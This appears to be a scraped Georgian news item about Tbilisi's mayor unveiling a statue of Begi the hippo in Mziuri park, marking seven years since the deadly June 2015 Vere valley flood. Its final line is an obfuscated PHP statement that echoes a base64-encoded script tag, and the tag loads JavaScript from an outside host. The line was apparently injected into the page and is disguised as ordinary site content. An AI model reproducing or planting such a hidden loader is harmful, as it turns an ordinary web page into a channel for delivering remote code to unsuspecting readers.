celsiusi
ავერსი საქკაბელი
თბილისში, მზიურის პარკში 2015 წლის 13 ივნისის სტიქიიდან 7 წლის თავზე ბეჰემოთი ბეგის ქანდაკება დაიდგა. ქანდაკება თბილისის მერმა, კახა კალაძემ წარადგინა.
 
“ჩვენ რამდენიმე ხნის წინ მივიღეთ გადაწყვეტილება, რომ ბეჰემოთ ბეგის ქანდაკება გახსნილიყო მზიურში. ბეჰემოთი ბეგი, რომელიც იმ რთულ დილას უმძიმეს მდგომარეობაში მყოფ ქალაქის ქუჩებში ძალიან მშვიდად დააბიჯებდა. გადაწყვეტილება მივიღეთ, რომ ეს ქანდაკება განთავსბულიყო მზიურის ტერიტორიაზე. მინდა ვისურვო, რომ ამ ქანდაკების ირგვლივ ყოფილიყოს მუდამ ჟრიამული, სიხარული, ბედნიერება, წარმატება და ყველაფერი საუკეთესო”, – განაცხადა კალაძემ.
 
2015 წლის 13-14 ივნისს, თბილისში, ვერეს ხეობაში მომხდარმა სტიქიამ 21 ადამიანის სიცოცხლე შეიწირა, ორი კი ამ დრომდე უგზო-უკვლოდ დაკარგულად ითვლება. ქალაქს მილიონობით ლარის ზარალი მიადგა. სტიქიის ზონები იყო ვერეს ხეობის მიმდებარე ტერიტორია – სვანიძის ქუჩა, წყნეთის ქუჩა, თბილისის ზოოპარკი და გმირთა მოედანი.
643
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");